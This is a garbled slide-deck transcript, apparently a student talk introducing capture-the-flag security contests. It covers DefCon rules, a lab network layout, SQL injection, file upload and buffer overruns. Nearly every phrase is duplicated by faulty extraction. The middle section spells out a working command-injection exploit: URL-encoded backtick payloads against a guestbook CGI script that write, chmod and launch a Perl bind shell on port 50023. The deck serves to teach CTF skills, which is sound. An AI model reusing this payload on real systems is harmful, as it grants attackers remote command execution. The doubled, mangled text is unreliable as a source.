ctf mike gerschefske justin gray. what is it? came from defcon came from defcon ucsb sp0nsorz –...
TRANSCRIPT
CTFCTF
Mike GerschefskeMike Gerschefske
Justin Justin GrayGray
What is it?What is it?
Came from DefconCame from DefconUCSB sp0nsorz – won last years DefconUCSB sp0nsorz – won last years DefconTest Skills of understanding securityTest Skills of understanding securityWhat it’s not!What it’s not!
See who’s 1337 or l4am3r through script See who’s 1337 or l4am3r through script kiddie techniqueskiddie techniques
RulesRules
Don’t be LameDon’t be LameThis includes (D)DoS – Unfair bandwidth This includes (D)DoS – Unfair bandwidth
practicespracticesCircumventing the private network and using Circumventing the private network and using
public ip address (not cool)public ip address (not cool) Illegal stuff is not a good ideaIllegal stuff is not a good idea
E.g. don’t hack the power gridE.g. don’t hack the power grid
Everything else is legal!Everything else is legal!
At Defcon team reverse engineered score At Defcon team reverse engineered score system and generated tokens.system and generated tokens.People got upset, but was legalPeople got upset, but was legal
Can root boxes but not what’s being Can root boxes but not what’s being tested.tested.w00tw00t
Last years eventLast years event
Have to assume this year is similarHave to assume this year is similar We p0wn3d the easy partsWe p0wn3d the easy parts
SQL InjectionSQL Injection Example http://128.198.61.43/~estore/cgi-bin/login.php Example http://128.198.61.43/~estore/cgi-bin/login.php
Exploit unchecked user inputExploit unchecked user input Security through obscuritySecurity through obscurity
OMG – this really works!!!OMG – this really works!!! Perl examplePerl example
Test Network
Real Network
Image 10.10.1.2
10.10.1.3Vuln
10.10.1.4Team
Hub
Team Box10.10.1.1
Mon Box10.10.1.x
AttackBoxes
Console for Fixes
Image Test Box
VulnPatch Test
VulnAttack Box
UCCSBoxes
UCCSBoxes
Affectively created two directional nat.Affectively created two directional nat.Blocking IP addresses is futileBlocking IP addresses is futile
All traffic comes from SAME IPAll traffic comes from SAME IPForces Packet InspectionForces Packet Inspection
Network TopographyNetwork Topography
the examplethe example http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`ehttp://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`e
cho%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhcho%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)-en)->accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\>accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`chmod%20755%20final.pl`guestbook=`chmod%20755%20final.pl`
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`final.pl` guestbook=`final.pl`
The basstard demoThe basstard demo
W00t W00t http://128.198.61.43http://128.198.61.43 SQL InjectionSQL Injection Unchecked code injectionUnchecked code injection
File upload!!!File upload!!!
Buffer overrunBuffer overrun Security through obscurity revisitedSecurity through obscurity revisited http://128.198.61.43/test/ccauthd/ccauthd.chttp://128.198.61.43/test/ccauthd/ccauthd.c
BackupsBackups
Network TopographyNetwork Topography
So you wanna be a h4x0rz?So you wanna be a h4x0rz?
Here’s what you need!Here’s what you need!vi – or any editorvi – or any editora browser – or anything to do httpa browser – or anything to do httpa compiler (depends on the situation)a compiler (depends on the situation)a debugger (optional)a debugger (optional)a clue!a clue!
Dumpster diving is coolDumpster diving is coolGetting information from the inside Getting information from the inside